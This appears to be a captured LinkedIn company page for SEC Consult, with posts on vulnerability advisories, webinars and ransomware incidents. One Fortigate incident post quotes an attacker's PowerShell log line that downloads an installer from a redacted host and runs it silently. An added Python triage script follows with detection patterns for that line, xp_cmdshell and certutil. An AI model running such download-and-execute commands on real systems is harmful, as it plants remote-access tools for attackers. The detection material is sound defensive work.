🚨 Incident Response: Lessons Learned from the Frontlines 🚨

In the ever-evolving world of cyber threats, adaptability and teamwork are 🔑. At SEC Defence, we're constantly refining our strategies to tackle unique challenges. 🛡️ Recently, we faced a particularly intriguing ransomware case that taught us some invaluable lessons.

💡 To share these insights, our colleague Ivan Boranijasevic interviewed Michael Popovtschak, the incident lead at SEC Consult Group, who expertly navigated the case. 🤝 Their discussion highlights the power of collaboration and shared experiences in staying ahead of emerging threats.

🔗 Read more about this fascinating case and the lessons learned in our latest blog post: https://lnkd.in/gRzaNTRh

#CyberSecurity #IncidentResponse #Ransomware #teamsecconsult
SEC Consult Group
IT Services and IT Consulting
Leading specialist in Application & Cybersecurity. SEC Consult is part of Eviden, an Atos business.

About
SEC Consult is one of the leading consultancies in the area of cyber and application security. SEC Consult’s customers include government agencies, international organizations and leading companies from various industries of the private sector as well as critical infrastructure. The company is certified in accordance with ISO 27001 as well as CREST at several locations. SEC Consult is part of Eviden: https://meilu.jpshuntong.com/url-68747470733a2f2f7777772e6c696e6b6564696e2e636f6d/company/eviden/

Our services:
• External and internal security audits
• Security certification for web applications (ÖNORM A 7700)
• Security audits of (standard) software applications (incl. Security Source Code Review)
• Evaluation of the security issues surrounding software acquisition
• Support for secure software development
• Selection and evaluation of security products
• Definition of security management processes (ISO 27001, GSHB)
• Optimization of security organizations, processes and policies
• Creation and optimization of risk management models for information security
• Forensic analysis
• Simulation of a real attack
• Integrate manual security reviews into your development process

Locations:
Vienna | Linz | St. Pölten | Wr. Neustadt
Berlin | Munich | Bochum | Nuremberg
Zurich | Singapore | Bangkok | Kuala Lumpur
- Website: https://meilu.jpshuntong.com/url-68747470733a2f2f7777772e7365632d636f6e73756c742e636f6d
- Industry: IT Services and IT Consulting
- Company size: 201–500 employees
- Headquarters: Vienna
- Type: Privately held
- Founded: 2002
- Specialties: Application Security Management, Information Security, IT-Security, Penetration Testing, Managed Security Services and Security Organisation and Processes
Updates
🚨 SEC Consult Identifies Critical Security Issues in High-End Network Scanners 🚨

We are announcing the results of the extensive security analysis by Daniel Hirschberger and Tobias Niemann of Image Access GmbH’s Scan2Net platform, used in their premium WideTEK and Bookeye scanners. While these products promise unparalleled performance and high security, our findings revealed a different picture.

💡 Advisory: https://lnkd.in/dcWpiqg6

Summary:
🔒 Our team discovered 14 critical vulnerabilities affecting firmware versions ≤7.42, including:
👉 OS Command Injection (RCE)
👉 Privilege Escalation
👉 Cross-Site Scripting (XSS)
👉 SQL Injection
👉 Hardcoded Credentials

❗ This case underlines the importance of robust security practices and reflects the rising expectations under the Cyber Resilience Act. It’s a wake-up call for vendors to prioritize security as much as innovation to protect the networks of customers, e.g. within public authorities or critical infrastructure.

Next Steps:
📝 If you use Scan2Net devices, update immediately to firmware 7.42B and check the vendor’s support page for future updates.
📝 Ensure that the Scan2Net devices are not reachable over the Internet and restrict internal access as much as possible.
📝 Vendors: Interested in a security review or need help navigating compliance requirements such as #CRA or #NIS2? Let our experts assist you.

Let’s work together to ensure a safer digital future!
#CyberSecurity #IoTSecurity #CyberResilienceAct #CRA

Linked advisory: Multiple Critical Vulnerabilities in Image Access Scan2Net (sec-consult.com)
Security Advisory: Stored Cross-Site Scripting Vulnerability in Omada Identity (CVE-2024-52951) 🚨
https://lnkd.in/gQatfpKc

A stored cross-site scripting (#XSS) vulnerability was identified by Daniel Hirschberger in Omada Identity, a popular enterprise-ready Identity Governance and Administration (IGA) solution. This issue allows authenticated users to execute arbitrary JavaScript in the browsers of other users who view manipulated "History" entries, potentially exposing higher-privileged users to phishing or other malicious activities.

🤨 What Happened?
• An authenticated user could inject malicious JavaScript into the "Request Reason" field of an access request.
• When another user (e.g., a manager reviewing the request) views the request history, the script executes in their browser.

🚦 Impact:
The vulnerability can be exploited to target privileged users, enabling attackers to:
• Perform phishing attacks.
• Execute arbitrary JavaScript for data theft or further privilege escalation attacks.

🚨 Affected Versions
• Users of v14.14 or lower should apply Hotfix #309.
• Upgrading to v15U1 is strongly recommended.

🚨 Vendor Response Timeline
Omada has acknowledged and addressed this issue with a coordinated response. Hotfixes and updates have been released. Special thanks to their team for their cooperation! #CVD

🛟 What should you do?
1. Upgrade to version v15U1 if possible.
2. If upgrading is not feasible, apply Hotfix #309 for version v14.14.
3. Conduct a thorough security review of your Omada Identity implementation to identify any additional vulnerabilities or configuration issues.

Organizations using Omada Identity should immediately patch their installations and implement routine security reviews to minimize risks. For full details and proof of concept, take a look at our technical security advisory.

💡 Stay secure and vigilant. Proactive updates save organizations from reactive crises!
#CyberSecurity #Vulnerability #XSS #InfoSec

Linked advisory: Stored Cross-Site Scripting in Omada Identity (sec-consult.com)
[Event] 🌥️ Cloudy with a Chance of DORA 🌩️

📢 Live Hacking a Cloud Infrastructure – Free Webinar 🚀
📅 Date: December 5, 2024
⏰ Time: 10:00 - 11:00 (CET)
📍 Language: German

What’s in store:
✅ How DORA impacts cloud operations
✅ A deep dive into cloud penetration testing
✅ Key responsibilities for cloud security
✅ Live hacking demo: See how attackers could steal sensitive bank customer data!

Meet your expert:
🧑💻 Moritz Gruber – Team Lead Offensive Security, SEC Consult Germany

🔗 Save your spot now: https://lnkd.in/dUGY5XwG
📌 Don’t miss out – level up your cloud security knowledge today!
#DORA #CyberSecurity #CloudSecurity
💻 Debunking Cloud Security Myths: Are You Putting Your Business at Risk?

Two common myths could jeopardize your company's cloud safety:
☁️ "The provider takes care of all data security in the cloud."
🔍 "A cloud security scanner finds all vulnerabilities – no need for a penetration test!"

These misconceptions can leave your organization vulnerable. Our latest blog post dives deep into these myths, explains their risks, and helps you understand what’s truly needed for cloud security.

👉 Read now to secure your business in the cloud: https://lnkd.in/dqsJN9h2

At SEC Consult, we help you uncover hidden vulnerabilities with tailored cloud penetration tests and expert guidance. Let’s make your cloud environment truly secure. 🛡
#CloudSecurity #CyberSecurity

Linked post: Debunking Cloud Security Myths: Clearing Misconceptions That Risk Your Business (sec-consult.com)
📋 Stefan Viehböck and Constantin Schieber-Knöbl identified vulnerabilities in Siemens Communication Elements CPCX26 (CP-2016, CP-2019) and SM-2558 Protocol Element

🚨 Webserver vulnerability: A buffer overflow vulnerability was discovered in the HTTP header parsing of the affected devices.
🚨 JTAG interface: Full access to the Zynq-7000 JTAG interface is possible on the SM-2558.
🔧 Fix status: The SM-2558 hardware is end-of-life (EOL) and will not receive a new HW revision. For these, we recommend assessing the need for mitigation or replacement.

👉 Full details and recommendations are available here: https://lnkd.in/d75ScFZ3
Staying informed is the first step to staying secure.

Our electric grid depends on robust, purpose-built substation automation and telecontrol solutions like Siemens SICAM RTUs to ensure reliable and seamless operation. During an in-depth assessment for one of our customers, we identified critical vulnerabilities in devices within the Siemens SICAM solution. These included an unauthenticated buffer overflow vulnerability in a webserver running in a custom RTOS. Further investigation revealed hardware-level security issues that could allow attackers with physical access to compromise the Xilinx/AMD Zynq FPGA.

We collaborated closely with Siemens ProductCERT to address these issues. As a result, Siemens has released updated firmware for all affected products. However, the hardware security vulnerabilities cannot be resolved through firmware updates alone, making it essential for affected organizations to implement additional mitigation measures.

This highlights the need for rigorous penetration testing by vendors, robust supply chain security testing, and ongoing collaboration across the energy sector to ensure the security and resilience of our critical infrastructure.
#CyberSecurity #EnergySector #CriticalInfrastructure #PenetrationTesting #SupplyChainSecurity #teamsecconsult
🚨 #CyberSecurity Insight 🚨 Fortigate Exploit (CVE-2023-48788): What Traces Did It Leave? 🚨

In a recent investigation of this exploit, we uncovered critical indicators that attackers left behind on affected hosts. Here's what we found:

💡 Two attack variants were used:
1️⃣ MSSQL Eventlogs (MSSQL$FCEMS): Look for xp_cmdshell (EventID 15457).
2️⃣ PowerShell Logs (EventID 600): Observed commands downloading and installing Splashtop:
HostApplication=powershell iwr -uri http://[redacted]/setup.msi -outfile C:\Windows\Temp\[redacted].msi ; msiexec /i C:\Windows\Temp\[redacted].msi /Qn
3️⃣ Certutil Activity: In another variant, attackers used certutil to deploy ScreenConnect (aka ConnectWise), leaving traces in MSSQL$FCEMS.

⚙ When Sysmon is installed: EventID 1 (Process Creation) and EventID 11 (File Creation) provided even more details on the attack's execution.

🔍 Key Takeaway: Regularly monitoring your logs and having tools like Sysmon in place can make all the difference in detecting and mitigating such threats.

➡️ If you’d like a proactive health check or assistance during an active attack, don’t hesitate to reach out to our experts directly. Our SEC Defence team is available 24/7 through our emergency hotline: https://lnkd.in/ekUqPnv
🇩🇪 Germany +49 30 398 2027 77
🇦🇹 Austria +43 1 890 30 43 7777
🇨🇭 Switzerland +41 44 545 10 85
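A small log-triage script for the three indicator types named in the post above, added here as an example and not code from SEC Consult or SEC Defence. The flat record shape (provider, event_id, message) and the sample events are constructed assumptions, not real captures from the investigation.

```python
import re

# Constructed sample events modelled on the indicator types named in the post. The flat
# record shape is a simplification assumed here, not the real Windows event schema.
SAMPLE_EVENTS = [
    {"provider": "MSSQL$FCEMS", "event_id": 15457,
     "message": "Configuration option 'xp_cmdshell' changed from 0 to 1."},
    {"provider": "MSSQL$FCEMS", "event_id": 15457,
     "message": "Configuration option 'show advanced options' changed from 0 to 1."},
    {"provider": "PowerShell", "event_id": 600,
     "message": "HostApplication=powershell iwr -uri http://[redacted]/setup.msi "
                "-outfile C:\\Windows\\Temp\\[redacted].msi ; "
                "msiexec /i C:\\Windows\\Temp\\[redacted].msi /Qn"},
    {"provider": "PowerShell", "event_id": 600,
     "message": "HostApplication=powershell Get-ChildItem C:\\inetpub\\logs"},
    {"provider": "MSSQL$FCEMS", "event_id": 15457,
     "message": "certutil invoked [arguments redacted]"},
]

# Detection rules as (name, predicate) pairs; message matching is case-insensitive.
RULES = [
    # Variant 1: xp_cmdshell being (re)enabled, logged by the MSSQL$FCEMS instance.
    ("mssql_xp_cmdshell", lambda e: e["provider"].startswith("MSSQL$")
        and e["event_id"] == 15457 and "xp_cmdshell" in e["message"].lower()),
    # Variant 2: PowerShell EventID 600 whose HostApplication downloads an MSI
    # (iwr / Invoke-WebRequest) and hands it to msiexec in the same command line.
    ("powershell_iwr_then_msiexec", lambda e: e["event_id"] == 600
        and "hostapplication=" in e["message"].lower()
        and re.search(r"\b(iwr|invoke-webrequest)\b", e["message"], re.I) is not None
        and re.search(r"\bmsiexec\b.*\.msi\b", e["message"], re.I) is not None),
    # Variant 3: certutil activity surfacing in the MSSQL$FCEMS channel.
    ("certutil_via_mssql", lambda e: e["provider"].startswith("MSSQL$")
        and "certutil" in e["message"].lower()),
]


def scan_events(events):
    """Return (rule_name, event) pairs for every event that trips a rule."""
    return [(name, ev) for ev in events for name, pred in RULES if pred(ev)]


def hit_names(events):
    """Only the rule names, in event order, for quick triage (and for the test)."""
    return [name for name, _ in scan_events(events)]


if __name__ == "__main__":
    for name, ev in scan_events(SAMPLE_EVENTS):
        print(f"[{name}] {ev['provider']} EventID {ev['event_id']}: {ev['message'][:70]}")
```

Feed it records exported from the MSSQL and PowerShell event channels in the same shape, and treat any hit as a starting point for a host-level review rather than a verdict on its own.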
We’re happy to announce that we’ll be attending BSides Vienna tomorrow! 🎉

📍 Location: Urania Dachsaal, Uraniastraße 1, 1010 Vienna

👨💻 Don’t miss our very own Timo Longin, Senior Security Consultant at SEC Consult, delivering his talk: "SMTP Smuggling Revisited – Still Spoofing E-mails Worldwide?!"
📅 When: 23.11, 14:10–14:40
📍 Where: Track 1 (Dachsaal)

🌍 BSides is a global series of community-driven events that promote independent security research, education, and collaboration. Whether you're here for the talks, workshops, or the amazing people, BSides Vienna is the place to be.

Let’s meet, learn, and push the boundaries of security research together. See you there! 👾
#BSidesVienna #Cybersecurity #InfosecCommunity #Networking
⚠️ Ransomgroup Helldown: Ongoing attack campaign on #Zyxel firewalls even with newest patch‼️

We observed multiple compromises in October 2024 and other institutions seem to observe similar cases! Our experts did a blog post to highlight the need to remain vigilant and monitor activity on the Zyxel Firewalls!

Find details on our blog post: 👉 https://lnkd.in/dwa7h9yM
#ransomware #secdefence #attack

Linked post: Ransomgroup Helldown: Attacks on Zyxel Devices (sec-consult.com)
🚨 New Blog Alert from SEC Defence! 🚨

Imagine stopping a #ransomware attack before it even starts – sounds like a win, right? 🙌

In her latest blog, our expert Barbara O. dives into a real 2024 case where proactive investigation and early detection saved the day. 💻

Key takeaway: Sometimes, all it takes is a suspicion to uncover an active intrusion and kick the attackers out before they can do any damage. This is a must-read for anyone looking to strengthen their cybersecurity defenses!

🔗 Read now: https://lnkd.in/dRFWUYRf
#CyberSecurity #Ransomware #IncidentResponse

Linked post: Inside the Threat: A Behind-the-Scenes Look at Stopping an Active Intrusion (sec-consult.com)